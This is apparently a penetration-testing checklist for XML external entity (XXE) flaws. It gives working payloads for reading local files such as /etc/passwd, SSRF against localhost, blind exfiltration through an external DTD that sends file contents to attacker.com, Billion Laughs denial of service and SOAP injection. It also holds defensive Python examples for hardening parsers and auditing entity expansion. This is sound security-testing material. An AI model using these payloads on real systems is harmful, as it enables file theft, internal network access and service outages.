  1. Initial Information Gathering

    • Identify and map all endpoints that accept XML input.
    • Review source code (if available) to understand XML parsing mechanisms.
    • Check for user inputs in XML request bodies, SOAP messages, and API endpoints.
  2. Basic XXE Testing

    • Test with a basic XXE payload to identify vulnerabilities:
      <!DOCTYPE foo [
        <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
      <foo>&xxe;</foo>
      
    • Inject the payload in different parts of the XML (e.g., elements, attributes). Note that XML forbids references to external entities inside attribute values, so &xxe; has to sit in element content; an attribute can only carry internal entities.
  3. XXE Payloads

    • Test for blind XXE using out-of-band (OOB) techniques; the response will not show the entity value, so the request arriving at your server is the signal:
      <!DOCTYPE foo [
        <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "http://attacker.com/xxe" >]>
      <foo>&xxe;</foo>
      
    • Test for SSRF (Server-Side Request Forgery):
      <!DOCTYPE foo [
        <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "http://localhost:8080/admin" >]>
      <foo>&xxe;</foo>
      
    • Test for local file disclosure with files that exist on most hosts (as file:// URLs, e.g. file:///C:/Windows/win.ini):
      • /etc/passwd
      • /etc/hosts
      • C:\Windows\win.ini
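    To see what steps 2 and 3 are actually probing for, the following Python example (added here; it is not part of the original checklist) parses the step-2 payload with a parser configured to resolve external entities and then with a hardened configuration. It uses only the standard-library expat binding and a constructed temporary file in place of /etc/passwd; the resolver only handles file:// URLs, a real one would fetch http:// URLs the same way, which is the OOB and SSRF case.

```python
"""Vulnerable vs. hardened expat setup against the step-2 file payload."""
import tempfile
import urllib.parse
import urllib.request
import xml.parsers.expat
from pathlib import Path


def build_file_payload(url: str) -> bytes:
    """The step-2 payload with the target URL substituted into the entity."""
    return (
        "<!DOCTYPE foo [\n"
        "  <!ELEMENT foo ANY >\n"
        f'  <!ENTITY xxe SYSTEM "{url}" >]>\n'
        "<foo>&xxe;</foo>"
    ).encode()


def parse_vulnerable(xml_bytes: bytes) -> str:
    """Return the text content, resolving file:// external entities.

    This stands in for a parser configured to fetch external general
    entities; a real resolver would fetch http:// URLs the same way."""
    parser = xml.parsers.expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def resolve(context, base, system_id, public_id):
        url = urllib.parse.urlparse(system_id)
        if url.scheme != "file":
            return 0  # any other scheme is a parse error in this example
        data = Path(urllib.request.url2pathname(url.path)).read_bytes()
        child = parser.ExternalEntityParserCreate(context)  # inherits handlers
        child.Parse(data, True)  # file contents become character data of <foo>
        return 1

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def parse_hardened(xml_bytes: bytes) -> str:
    """Same parse, but any DOCTYPE is refused and external entities never resolve."""
    parser = xml.parsers.expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError(f"DOCTYPE declaration refused (root {name!r})")

    parser.StartDoctypeDeclHandler = reject_doctype
    # Defence in depth: even if a DTD got through, refuse to fetch anything.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def run_demo() -> dict:
    """Leak a constructed secret file via the vulnerable parser; show the hardened one refuse it."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "secret.txt"  # constructed stand-in for /etc/passwd
        secret.write_text("s3cr3t-token")
        payload = build_file_payload(secret.as_uri())
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            refused = ""
        except ValueError as exc:
            refused = str(exc)
    return {"leaked": leaked, "refused": refused}


if __name__ == "__main__":
    print(run_demo())
```

    Refusing the DOCTYPE outright is the simplest fix and also removes the entity-expansion attacks later in this checklist; only disable entity resolution alone when the application genuinely needs internal DTDs.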
  4. Parameter Entities and XML Injection

    • Test with parameter entities. They are written %name; and can only be referenced inside the DTD, and a parameter entity reference is not allowed inside an entity value in the internal subset, so the useful pattern is to pull in an external DTD that does the work. This is the standard route when the entity value is never reflected in a response:
      <!DOCTYPE foo [
        <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd" >
        %xxe; ]>
      <foo>test</foo>
      
      where evil.dtd, hosted on your server, defines an entity that embeds a local file's contents in a URL back to you (a single-line file such as /etc/hostname works best; newlines break the URL):
      <!ENTITY % file SYSTEM "file:///etc/hostname" >
      <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;' >" >
      %eval; %exfil;
      
    • Test XML injection to manipulate the structure and content. This applies where user input is concatenated into XML that the server builds (here the value of <data>): submit a value that closes the element and adds markup of its own, such as value</data><data>injected</data><data>, and check whether the result is parsed as the new structure rather than rejected or escaped:
      <root>
        <data>value</data><data>injected</data><data></data>
      </root>
      
  5. Recursive Entities

    • Test for recursive entity expansion (Billion Laughs Attack):
      <!DOCTYPE lolz [
        <!ENTITY lol "lol">
        <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
        <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
        <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
        <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
        <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
        <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
        <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
        <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
        <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
      ]>
      <lolz>&lol9;</lolz>
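    The payload above is small on the wire but expands to 10^9 copies of "lol". The following Python example (added here, not part of the original checklist) generates that document for any depth and fan-out and statically computes how large each entity becomes when fully expanded, which is the kind of pre-parse check you can put in front of a parser that lacks its own amplification limit. It handles only internal, double-quoted general entities and flags recursive definitions, which XML forbids anyway; external and parameter entities are out of scope for it.

```python
"""Static estimate of entity expansion for a DOCTYPE internal subset."""
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+[^\[>]+\[(.*?)\]\s*>", re.DOTALL)
# Internal general entities with a double-quoted literal value only;
# external (SYSTEM/PUBLIC) and parameter (%) entities are ignored here.
ENTITY_DECL_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF_RE = re.compile(r"&(\w+);")


def build_billion_laughs(depth: int = 9, fanout: int = 10) -> str:
    """Generate the nested-entity document from the checklist (depth 9, fan-out 10)."""
    decls = ['<!ENTITY lol "lol">']
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    body = "\n  ".join(decls)
    return f"<!DOCTYPE lolz [\n  {body}\n]>\n<lolz>&lol{depth};</lolz>"


def entity_expansion_sizes(subset: str) -> dict:
    """Characters each entity occupies once fully expanded; raises on cycles."""
    decls = dict(ENTITY_DECL_RE.findall(subset))
    sizes = {}

    def expanded(name, trail):
        if name in trail:
            raise ValueError("recursive entity reference: " + " -> ".join(trail + (name,)))
        if name in sizes:
            return sizes[name]
        text = decls[name]
        total, last = 0, 0
        for m in ENTITY_REF_RE.finditer(text):
            total += m.start() - last
            ref = m.group(1)
            # Names not declared here (e.g. the predefined &amp;) count as written.
            total += expanded(ref, trail + (name,)) if ref in decls else len(m.group(0))
            last = m.end()
        total += len(text) - last
        sizes[name] = total
        return total

    for name in decls:
        expanded(name, ())
    return sizes


def audit_doctype(xml_text: str, max_expansion: int = 1_000_000) -> dict:
    """Summarise the internal subset and decide whether to reject the document."""
    m = DOCTYPE_RE.search(xml_text)
    if not m:
        return {"declared_chars": 0, "max_expansion": 0,
                "amplification": 1.0, "reject": False, "reason": ""}
    subset = m.group(1)
    try:
        sizes = entity_expansion_sizes(subset)
    except ValueError as exc:
        return {"declared_chars": len(subset), "max_expansion": None,
                "amplification": None, "reject": True, "reason": str(exc)}
    biggest = max(sizes.values(), default=0)
    declared = len(subset)
    reject = biggest > max_expansion
    return {
        "declared_chars": declared,
        "max_expansion": biggest,
        "amplification": biggest / max(declared, 1),
        "reject": reject,
        "reason": f"expansion {biggest} exceeds {max_expansion}" if reject else "",
    }


if __name__ == "__main__":
    print(audit_doctype(build_billion_laughs()))
```

    The threshold is a policy choice; a few hundred kilobytes is generous for legitimate DTDs. Modern libexpat applies a comparable amplification limit at parse time, but a parser-independent check lets you reject and log the request before any expansion happens.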
      
  6. Out-of-Band (OOB) Detection

    • Set up an OOB endpoint to detect blind XXE:
      <!DOCTYPE foo [
        <!ELEMENT foo ANY >
        <!ENTITY xxe SYSTEM "http://yourserver.com/xxe" >]>
      <foo>&xxe;</foo>
      
    • Use tools like Burp Collaborator to capture OOB interactions.
  7. Error Handling and Response Analysis

    • Analyze server responses for clues about XXE vulnerabilities.
    • Look for error messages that disclose file paths or other sensitive information.
    • Verify if application stack traces are exposed in responses.
  8. SOAP Services

    • Test SOAP-based services for XXE vulnerabilities. The DOCTYPE must precede the Envelope, which is the document's root element, otherwise &xxe; is undefined and the parser rejects the message:
      <?xml version="1.0"?>
      <!DOCTYPE soap:Envelope [
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
      <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
          <foo>&xxe;</foo>
        </soap:Body>
      </soap:Envelope>